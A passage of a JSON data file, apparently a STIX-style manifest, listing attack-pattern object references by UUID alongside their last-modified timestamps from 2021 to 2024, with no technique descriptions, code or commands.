"attack-pattern--1b84d551-6de8-4b96-9930-d177677c3b1d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--1c2fd73a-e634-44ed-b1b5-9e7cf7404e9f", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--1c338d0f-a65e-4073-a5c1-c06878849f21", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "object_modified": "2023-10-13T17:57:00.184Z"}, {"object_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "object_modified": "2023-09-14T21:12:48.409Z"}, {"object_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", "object_modified": "2024-04-08T18:57:58.010Z"}, {"object_ref": "attack-pattern--1ce03c65-5946-4ac9-9d4d-66db87e024bd", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--1cec9319-743b-4840-bb65-431547bce82a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", "object_modified": "2023-03-30T21:01:48.643Z"}, {"object_ref": "attack-pattern--1df0326d-2fbc-4d08-a16b-48365f1e742d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "object_modified": "2024-04-16T12:26:07.945Z"}, {"object_ref": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--1f47e2fd-fa77-4f2f-88ee-e85df308f125", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", "object_modified": "2024-03-01T17:55:56.116Z"}, {"object_ref": "attack-pattern--20138b9d-1aac-4a26-8654-a36b6bbf2bba", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", "object_modified": "2023-06-14T23:03:51.540Z"}, {"object_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--215190a9-9f02-4e83-bb5f-e0589965a302", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--2169ba87-1146-4fc7-a118-12b72251db7e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", "object_modified": "2024-04-15T21:33:57.732Z"}, {"object_ref": "attack-pattern--22522668-ddf6-470b-a027-9d6866679f67", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "object_modified": "2024-03-29T17:45:48.126Z"}, {"object_ref": "attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80", "object_modified": "2023-05-08T20:13:24.241Z"}, {"object_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", "object_modified": "2023-09-15T18:57:21.881Z"}, {"object_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "object_modified": "2023-04-21T12:22:19.740Z"}, {"object_ref": "attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--241814ae-de3f-4656-b49e-f9a80764d4b7", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", "object_modified": "2023-05-31T12:33:20.915Z"}, {"object_ref": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", "object_modified": "2024-04-19T04:27:51.388Z"}, {"object_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", "object_modified": "2023-10-13T17:57:00.378Z"}, {"object_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", "object_modified": "2023-12-26T20:58:19.356Z"}, {"object_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", "object_modified": "2024-01-11T23:47:44.655Z"}, {"object_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", "object_modified": "2023-10-13T17:57:00.575Z"}, {"object_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "object_modified": "2023-10-13T17:57:00.768Z"}, {"object_ref": "attack-pattern--2715c335-1bf2-4efe-9f18-0691317ff83b", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", "object_modified": "2023-10-13T17:57:00.969Z"}, {"object_ref": "attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--27960489-4e7f-461d-a62a-f5c0cb521e4a", "object_modified": "2023-11-02T15:39:10.534Z"}, {"object_ref": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", "object_modified": "2023-10-13T17:57:01.165Z"}, {"object_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", "object_modified": "2023-10-13T17:57:01.367Z"}, {"object_ref": "attack-pattern--2892b9ee-ca9f-4723-b332-0dc6e843a8ae", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", "object_modified": "2023-10-13T17:57:01.578Z"}, {"object_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "object_modified": "2024-04-11T19:25:51.394Z"}, {"object_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", "object_modified": "2024-04-19T12:49:40.919Z"}, {"object_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", "object_modified": "2023-10-13T17:57:01.778Z"}, {"object_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", "object_modified": "2024-04-15T23:51:25.037Z"}, {"object_ref": "attack-pattern--2ba5aa71-9d15-4b22-b726-56af06d9ad2f", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163", "object_modified": "2023-10-13T17:57:01.994Z"}, {"object_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", "object_modified": "2023-10-13T17:57:02.197Z"}, {"object_ref": "attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230", "object_modified": "2024-04-19T13:26:16.082Z"}, {"object_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", "object_modified": "2023-08-11T20:24:03.069Z"}, {"object_ref": "attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "object_modified": "2024-03-29T18:29:06.873Z"}, {"object_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", "object_modified": "2023-10-13T17:57:02.398Z"}, {"object_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", "object_modified": "2023-10-04T14:16:17.655Z"}, {"object_ref": "attack-pattern--2e0dd10b-676d-4964-acd0-8a404c92b044", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--2e114e45-2c50-404c-804a-3af9564d240e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "object_modified": "2024-01-31T14:09:27.066Z"}, {"object_ref": "attack-pattern--2edd9d6a-5674-4326-a600-ba56de467286", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", "object_modified": "2024-04-16T12:26:49.584Z"}, {"object_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "object_modified": "2023-10-13T17:57:02.595Z"}, {"object_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", "object_modified": "2024-04-28T15:51:58.945Z"}, {"object_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", "object_modified": "2024-01-02T13:35:57.680Z"}, {"object_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", "object_modified": "2023-10-13T17:57:02.785Z"}, {"object_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", "object_modified": "2023-04-14T21:51:47.277Z"}, {"object_ref": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", "object_modified": "2024-04-10T16:41:01.496Z"}, {"object_ref": "attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--317fefa6-46c7-4062-adb6-2008cf6bcb41", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--31fe0ba2-62fd-4fd9-9293-4043d84f7fe9", "object_modified": "2023-04-15T00:21:55.791Z"}, {"object_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", "object_modified": "2024-04-19T12:32:44.370Z"}, {"object_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", "object_modified": "2023-10-13T17:57:02.990Z"}, {"object_ref": "attack-pattern--327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", "object_modified": "2022-09-22T19:13:52.548Z"}, {"object_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7", "object_modified": "2023-09-29T16:11:43.530Z"}, {"object_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", "object_modified": "2023-10-13T17:57:03.187Z"}, {"object_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", "object_modified": "2023-07-28T18:29:56.525Z"}, {"object_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", "object_modified": "2023-09-29T19:44:43.870Z"}, {"object_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", "object_modified": "2023-10-03T04:06:42.256Z"}, {"object_ref": "attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", "object_modified": "2023-10-13T17:57:03.395Z"}, {"object_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "object_modified": "2024-01-17T22:52:23.454Z"}, {"object_ref": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8", "object_modified": "2024-04-28T15:44:25.342Z"}, {"object_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--35d30338-5bfa-41b0-a170-ec06dfd75f64", "object_modified": "2023-10-16T17:51:35.865Z"}, {"object_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "object_modified": "2024-03-01T15:29:46.832Z"}, {"object_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--36675cd3-fe00-454c-8516-aebecacbe9d9", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", "object_modified": "2023-03-30T21:01:41.052Z"}, {"object_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", "object_modified": "2023-10-13T17:57:03.589Z"}, {"object_ref": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb", "object_modified": "2024-03-01T19:06:05.126Z"}, {"object_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "object_modified": "2023-10-13T17:57:03.783Z"}, {"object_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", "object_modified": "2024-04-18T23:22:37.874Z"}, {"object_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", "object_modified": "2023-10-13T16:01:07.538Z"}, {"object_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", "object_modified": "2023-09-08T18:05:28.311Z"}, {"object_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", "object_modified": "2021-06-07T19:23:33.039Z"}, {"object_ref": "attack-pattern--39a130e1-6ab7-434a-8bd2-418e7d9d6427", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5", "object_modified": "2024-04-28T15:58:48.119Z"}, {"object_ref": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "object_modified": "2024-02-14T20:07:44.756Z"}, {"object_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--3b4121aa-fc8b-40c8-ac4f-afcb5838b72c", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "object_modified": "2023-10-13T17:57:03.989Z"}, {"object_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", "object_modified": "2023-10-17T20:42:21.453Z"}, {"object_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", "object_modified": "2023-08-14T19:28:18.334Z"}, {"object_ref": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "object_modified": "2023-10-20T16:43:53.391Z"}, {"object_ref": "attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a", "object_modified": "2022-10-21T14:21:57.991Z"}, {"object_ref": "attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b", "object_modified": "2023-04-11T01:07:48.218Z"}, {"object_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", "object_modified": "2024-04-05T16:34:58.587Z"}, {"object_ref": "attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e", "object_modified": "2023-04-11T23:22:49.534Z"}, {"object_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "object_modified": "2024-02-26T14:23:37.009Z"}, {"object_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", "object_modified": "2023-10-13T17:57:04.376Z"}, {"object_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", "object_modified": "2023-11-28T21:27:35.373Z"}, {"object_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "object_modified": "2024-03-01T16:58:02.395Z"}, {"object_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "object_modified": "2024-02-26T14:19:09.417Z"}, {"object_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "object_modified": "2023-09-05T15:00:36.471Z"}, {"object_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", "object_modified": "2024-04-12T23:52:30.489Z"}, {"object_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", "object_modified": "2023-10-13T17:57:04.582Z"}, {"object_ref": "attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3", "object_modified": "2024-04-28T15:55:55.068Z"}, {"object_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--428ca9f8-0e33-442a-be87-f869cb4cf73e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "object_modified": "2024-03-08T17:00:59.133Z"}, {"object_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "object_modified": "2024-04-15T21:33:12.892Z"}, {"object_ref": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "object_modified": "2024-04-12T02:49:39.980Z"}, {"object_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", "object_modified": "2023-10-01T02:28:45.147Z"}, {"object_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", "object_modified": "2023-10-12T05:22:59.079Z"}, {"object_ref": "attack-pattern--44dca04b-808d-46ca-b25f-d85236d4b9f8", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "object_modified": "2022-11-08T14:00:00.188Z"}, {"object_ref": "attack-pattern--45241b9e-9bbc-4826-a2cc-78855e51ca09", "object_modified": "2023-10-27T18:32:11.219Z"}, {"object_ref": "attack-pattern--4579d9c9-d5b9-45e0-9848-0104637b579f", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "object_modified": "2024-03-01T16:25:43.150Z"}, {"object_ref": "attack-pattern--45d84c8b-c1e2-474d-a14d-69b5de0a2bc0", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--46944654-fcc1-4f63-9dad-628102376586", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--478aa214-2ca7-4ec0-9978-18798e514790", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", "object_modified": "2024-02-09T18:49:08.428Z"}, {"object_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "object_modified": "2023-10-13T17:57:04.784Z"}, {"object_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", "object_modified": "2023-10-05T11:35:30.887Z"}, {"object_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", "object_modified": "2023-11-06T20:14:51.609Z"}, {"object_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", "object_modified": "2024-04-19T12:42:18.632Z"}, {"object_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--4be89c7c-ace6-4876-9377-c8d54cef3d63", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--4bf5845d-a814-4490-bc5c-ccdee6043025", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", "object_modified": "2023-10-13T17:57:04.993Z"}, {"object_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a", "object_modified": "2023-09-18T22:33:57.556Z"}, {"object_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", "object_modified": "2023-07-28T17:34:51.250Z"}, {"object_ref": "attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--506f6f49-7045-4156-9007-7474cb44ad6d", "object_modified": "2022-10-20T20:16:32.599Z"}, {"object_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064", "object_modified": "2023-05-08T20:13:24.241Z"}, {"object_ref": "attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--519630c5-f03f-4882-825c-3af924935817", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", "object_modified": "2024-04-28T15:43:30.271Z"}, {"object_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", "object_modified": "2023-09-11T16:06:10.376Z"}, {"object_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", "object_modified": "2024-04-19T04:27:00.005Z"}, {"object_ref": "attack-pattern--52d40641-c480-4ad5-81a3-c80ccaddf82d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--52f3d5a6-8a0f-4f82-977e-750abf90d0b0", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", "object_modified": "2024-03-28T00:01:08.337Z"}, {"object_ref": "attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00", "object_modified": "2023-05-08T20:13:24.241Z"}, {"object_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "object_modified": "2023-10-13T17:57:05.190Z"}, {"object_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", "object_modified": "2023-10-13T17:57:05.375Z"}, {"object_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "object_modified": "2024-01-20T00:07:58.958Z"}, {"object_ref": "attack-pattern--53bfc8bf-8f76-4cd7-8958-49a884ddb3ee", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", "object_modified": "2022-05-24T14:00:00.188Z"}, {"object_ref": "attack-pattern--54456690-84de-4538-9101-643e26437e09", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", "object_modified": 